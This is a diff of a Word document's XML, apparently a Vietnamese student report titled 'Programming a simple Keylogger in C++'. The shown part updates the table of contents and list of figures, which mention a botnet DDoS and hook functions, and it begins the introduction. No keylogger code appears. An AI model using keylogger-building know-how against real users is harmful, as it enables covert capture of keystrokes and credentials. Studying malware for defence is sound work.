+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761781" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>KẾT LUẬN</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761781 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>31</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1819,7 +4445,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
             </w:tabs>
-            <w:spacing w:before="120" w:after="0"/>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
@@ -1827,7 +4452,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc56805881" w:history="1">
+          <w:hyperlink w:anchor="_Toc57761782" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1838,7 +4463,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>CHƯƠNG I:</w:t>
+              <w:t>TÀI LIỆU THAM KHẢO</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1868,7 +4493,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc56805881 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761782 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1897,7 +4522,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>32</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1917,7 +4542,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
             </w:tabs>
-            <w:spacing w:before="120" w:after="0"/>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
@@ -1925,7 +4549,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc56805882" w:history="1">
+          <w:hyperlink w:anchor="_Toc57761783" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1936,7 +4560,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>CHƯƠNG II:</w:t>
+              <w:t>PHỤ LỤC</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1966,7 +4590,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc56805882 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761783 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1995,301 +4619,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
-            </w:tabs>
-            <w:spacing w:before="120" w:after="0"/>
-            <w:rPr>
-              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc56805883" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>KẾT LUẬN</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc56805883 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
-            </w:tabs>
-            <w:spacing w:before="120" w:after="0"/>
-            <w:rPr>
-              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc56805884" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>TÀI LIỆU THAM KHẢO</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc56805884 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>7</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
-            </w:tabs>
-            <w:spacing w:before="120" w:after="0"/>
-            <w:rPr>
-              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc56805885" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>PHỤ LỤC</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc56805885 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>8</w:t>
+              <w:t>33</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2338,7 +4668,6 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc56805880"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2361,6 +4690,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc57761754"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2373,7 +4703,235 @@
         <w:lastRenderedPageBreak/>
         <w:t>DANH MỤC HÌNH ẢNH</w:t>
       </w:r>
-    </w:p>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1705"/>
+        <w:gridCol w:w="7690"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1705" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="120" w:after="120"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Trang</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7690" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="120" w:after="120"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Hình</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1705" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="120" w:after="120"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7690" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="120" w:after="120"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Hình 1.1: Minh họa cuộc tấn công DDOS sử dụng Botnet</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1705" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="120" w:after="120"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>16</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7690" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="120" w:after="120"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Hình 2.1: Quy trình thực hiện hàm Hook</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1705" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="120" w:after="120"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>22</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7690" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="120" w:after="120"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Hình 2.2: Giá trị cờ trong Compiler Settings</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -2409,6 +4967,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc57761755"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2422,7 +4981,7 @@
         <w:t>LỜI MỞ ĐẦU</w:t>
       </w:r>
       <w:bookmarkEnd w:id="4"/>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2438,103 +4997,415 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc57761756"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1. Lý do chọn đề tài</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="7"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Chúng ta đang sống trong thời kỳ của kỷ nguyên kỹ thuật số gắn liền với những đột phá về công nghệ, trong đó công nghệ thông tin (CNTT) đóng vai trò là công nghệ cốt lõi. CNTT không chỉ là một ngành kinh tế mà còn là động lực quan trọng để giúp các ngành khác phát triển. Trong tương lai, cách sống, làm việc, sản xuất của con người sẽ được thay đổi mạnh mẽ. Công nghệ mới sẽ sắp xếp lại thị trường lao động, nhiều việc làm truyền thống sẽ mất đi, nhiều công việc mới, cơ hội mới sẽ xuất hiện thay thế.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Song song với những phần mềm, ứng dụng đem lại giá trị lợi ích cho con người thì có những kẻ có dã tâm xấu đã phát triển những phần mềm độc hại đối với máy tính, gọi chung là mã độc. Mã độc rất đa dạng, từ cách thức tấn công, tác hại của chúng cũng như ngôn ngữ lập trình ra chúng.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sự phát triển của mã độc hiện nay là vô cùng nhanh, đòi hỏi mỗi lập trình viên, những người quản trị hệ thống phải biết cách đối phó và ngăn chặn. Để làm được điều này, việc hiểu cấu trúc và cách thức hoạt động của nó là vô cùng quan trọng. Đối với em, một sinh viên có định hướng theo ngành </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>An</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> toàn thông tin, mã độc là một khía cạnh rất quan trọng bắt buộc phải có kiến thức vững vàng. Vì vậy, sau khi được nhà trường xếp thầy Phạm Huy Hoàng là giảng viên hướng dẫn, em đã quyết định lựa chọn đề tài: “Lập trình một Keylogger đơn giản bằng ngôn ngữ lập trình C++”.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
